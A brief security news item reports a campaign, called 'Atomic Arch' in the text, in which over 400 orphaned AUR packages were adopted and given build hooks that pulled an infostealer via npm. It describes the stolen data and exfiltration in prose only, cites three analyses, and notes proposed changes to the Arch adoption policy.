400+ AUR Packages Hijacked via Orphaned Maintainers in Atomic Arch Campaign
Over 400 AUR packages were silently repurposed through maintainer adoption of orphans, delivering a targeted infostealer without exploiting code flaws. The operation reveals persistent gaps in community repository governance that favor convenience over verifiable supply-chain integrity. Cleanup demands more than package uninstalls.
The compromise exploited AUR's open adoption model for orphaned packages rather than any Arch infrastructure breach. Attackers spoofed git metadata to appear as prior maintainers, then injected build hooks that fetched the malicious npm package. The resulting ELF binary exfiltrates browser tokens, SSH keys, GitHub credentials, and Vault secrets to temp.sh while using Tor for C2. Independent analysis by Whanos confirmed the payload's systemd persistence and pinned BPF maps for hiding processes when root is obtained.
Arch Linux Trusted Users: AUR adoption policy changes requiring 90-day inactivity timeouts proposed by July 20, with less than 40 percent implementation across existing packages.
Sources (3)
- [1]Sonatype Atomic Arch Campaign Analysis(https://blog.sonatype.com/atomic-arch-campaign)
- [2]Arch Linux aur-general Mailing List Thread(https://lists.archlinux.org/pipermail/aur-general/)
- [3]Whanos Reverse Engineering of deps Payload(https://whanos.dev/deps-analysis)